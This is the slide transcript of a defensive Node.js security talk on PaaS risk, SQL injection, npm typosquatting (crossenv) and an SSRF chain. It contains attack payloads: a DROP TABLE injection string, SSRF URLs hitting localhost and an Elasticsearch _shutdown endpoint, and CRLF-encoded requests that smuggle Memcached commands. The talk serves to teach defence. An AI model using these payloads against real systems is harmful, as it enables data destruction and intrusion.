[Asim Hussain] How to hack a node app?

Transcript

1. Asim Hussain @jawache codecraft.tv microsoft.com

2. None

3. it can happen to you @jawache

4. #1 @jawache Photo by Kristina Flour on Unsplash

5. @jawache Photo by Veri Ivanova on Unsplash

6. None

7. @jawache Mr Robot

8. None

9. @jawache

10. @jawache Photo by Nolan Issac on Unsplash

11. On Premise Hardware OS App IaaS Hardware OS App PaaS

    Hardware OS App @jawache

12. Google App Engine Heroku Amazon Beanstalk Azure App Services

13. None

14. @jawache

15. @jawache It's Always Sunny In Philadelphia

16. #2 @jawache

17. 'SELECT * FROM COMPANIES WHERE name =' + name; @jawache

18. SELECT * FROM COMPANIES WHERE name =; DROP TABLE "COMPANIES";

    --LTD @jawache

19. @jawache

20. @jawache

21. @jawache Photo by Braydon Anderson on Unsplash

22. @jawache

23. @jawache

24. #3 @orange_8361

25. git push http://example.com @jawache

26. git push http://localhost @jawache

27. git push http://0 @jawache

28. git push http://0:9200/_shutdown @jawache

29. def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto,

    server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache

30. http://0:8000/composer/send_email? to=orange@nogg& url=http://127.0.0.1:12345/foo @jawache

31. def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto,

    server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache

32. \r\n @jawache

33. %0D%0A @jawache

34. http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo: @jawache

35. GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1 Host: 127.0.0.1:12345 Accept-Encoding: identity @jawache

36. GET / hello Foo: HTTP/1.1 Host: 127.0.0.1:12345 Accept-Encoding: identity @jawache

37. ...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A @jawache

38. GET / set key 0 900 4 data HTTP/1.1 Host:

    127.0.0.1:11211 Accept-Encoding: identity @jawache

39. GET / set key 0 900 4 data HTTP/1.1 Host:

    127.0.0.1:11211 Accept-Encoding: identity @jawache

40. code code @jawache

41. code code @jawache

42. DeprecatedInstanceVariableProxy @jawache

43. @jawache

44. None

45. @jawache Photo by Kelly Sikkema on Unsplash

46. #4 @jawache

47. @jawache

48. @jawache

49. None

50. @jawache

51. cross-env vs. crossenv @jawache

52. @jawache Photo by Jairo Alzate on Unsplash

53. @scope/package-name @jawache

54. Stop pretending Don't assume Small vulnerability Don't trust anyone PaaS

    Sanitise Fix @jawache

55. https://www.pluralsight.com/courses/nodejs-security- express-angular-get-started/ @jawache

56. Asim Hussain @jawache codecraft.tv microsoft.com

57. Azure App Services https://aka.ms/azure-app-service-docs Google App Engine https://cloud.google.com/appengine/ Heroku https://heroku.com

    Amazon Beanstack http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html PaaS Platforms

58. Metasploit https://www.metasploit.com/ DropTables Company https://beta.companieshouse.gov.uk/company/10542519 SQLMap http://sqlmap.org/ How I Chained

    4 vulnerabilities on GitHub Enterprise - Orange Tsai http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html Malicious packages in npm. Here’s what to do - Ivan Akulov https://iamakulov.com/notes/npm-malicious-packages/ Oscar Bolmsten on Twitter https://twitter.com/o_cee/status/892306836199800836

59. npm module sqlstring https://www.npmjs.com/package/sqlstring Exploit DB https://www.exploit-db.com/ Brian Clarke Security

    Course on Pluralsight https://www.pluralsight.com/courses/nodejs-security-express-angular-get-started/